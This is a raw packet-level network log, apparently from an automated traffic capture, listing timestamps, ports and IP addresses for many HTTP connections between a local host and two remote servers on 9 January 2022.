Jan 9, 2022 18:48:40.448941946 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.448964119 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.448983908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449006081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449028015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449031115 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449042082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449059010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449063063 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449080944 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449101925 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449120045 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449127913 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449136019 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449156046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449177027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449181080 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449197054 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449217081 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449230909 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449237108 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449258089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449276924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449280024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449301958 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449321985 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449322939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449342012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449362993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449363947 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449383974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449402094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.449417114 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.449449062 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.453736067 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.453836918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.496943951 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497010946 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497052908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497090101 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497102022 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497132063 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497152090 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497173071 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497211933 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497246027 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497252941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497292995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497327089 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497332096 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497373104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497391939 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497411013 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497450113 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497489929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497493982 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497529030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497569084 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497579098 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497608900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497648954 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497670889 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497689009 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497728109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497736931 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.497764111 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.497823954 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.498413086 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498455048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498492002 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.498496056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498534918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498573065 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.498574972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498639107 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.498800039 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498842001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498881102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498897076 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.498922110 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498961926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.498977900 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499002934 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499043941 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499070883 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499084949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499124050 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499140978 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499164104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499202967 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499222040 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499243021 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499281883 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499296904 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499320030 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499357939 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499373913 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499397993 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499437094 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499450922 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499476910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499516010 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499532938 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499550104 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499592066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499605894 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499629974 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499666929 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499692917 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499790907 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499854088 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.499908924 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499946117 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.499989986 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500004053 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500030041 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500068903 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500107050 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500108004 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500149012 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500164032 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500186920 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500226021 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500240088 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500266075 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500305891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500319958 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500345945 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500382900 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500401020 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500422001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500461102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500474930 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500498056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500539064 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500555992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500576973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500617027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500631094 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500655890 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500693083 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500710964 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500732899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500771999 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500787973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.500802994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.500860929 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.501856089 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503268957 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503313065 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503387928 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503417015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503458023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503496885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503521919 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503536940 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503576994 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503592968 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503618002 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503660917 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503674030 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503700972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503741980 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503757000 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503781080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503818989 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503835917 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503858089 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503896952 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503911018 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.503947973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.503988028 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504003048 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504024982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504065037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504082918 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504103899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504142046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504160881 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504180908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504220009 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504220963 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504235983 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504259109 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504297972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504324913 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504334927 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504365921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504399061 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.504405022 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.504472971 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.509726048 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.512723923 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.512759924 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.512973070 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.513031006 CET	49858	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.539311886 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.691854954 CET	80	49858	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.710861921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.710906029 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.710943937 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.710977077 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.710985899 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711028099 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711040020 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711066008 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711103916 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711112022 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711143017 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711183071 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711194992 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711222887 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711260080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711271048 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711298943 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711338997 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711347103 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711376905 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711416006 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711430073 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711452961 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711493015 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711504936 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711533070 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711570024 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711581945 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711607933 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711646080 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711657047 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711688995 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711726904 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711735010 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711766005 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711798906 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711810112 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.711838007 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711870909 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.711883068 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.718643904 CET	80	49859	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:40.718811989 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.718861103 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.720433950 CET	49859	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:40.751502037 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760324001 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760375023 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760412931 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760441065 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760456085 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760495901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760507107 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760534048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760575056 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760579109 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760613918 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760653973 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760658979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760694027 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760730982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760737896 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760771036 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760808945 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760812998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760868073 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760912895 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.760935068 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.760973930 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761013031 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761018991 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761051893 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761091948 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761096001 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761127949 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761168003 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761172056 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761205912 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761244059 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761250973 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761282921 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761316061 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761327028 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761353970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761389971 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761399984 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761426926 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761466026 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761471987 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761504889 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761540890 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761550903 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761579037 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761616945 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761621952 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761656046 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761694908 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761702061 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761733055 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761770964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761776924 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761810064 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761846066 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761852980 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761884928 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761912107 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761929989 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.761950970 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761991978 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.761996031 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.762027025 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762065887 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762072086 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.762104034 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762140989 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762151003 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.762173891 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762217045 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.762898922 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762938976 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762976885 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.762988091 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763015985 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763058901 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763060093 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763097048 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763137102 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763139963 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763175964 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763216972 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763221979 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763256073 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763293982 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763303995 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763333082 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763370991 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763375998 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763406992 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763446093 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763452053 CET	49854	80	192.168.2.3	211.169.6.249
Jan 9, 2022 18:48:40.763483047 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763521910 CET	80	49854	211.169.6.249	192.168.2.3
Jan 9, 2022 18:48:40.763526917 CET	49854	80	192.168.2.3	211.169.6.249
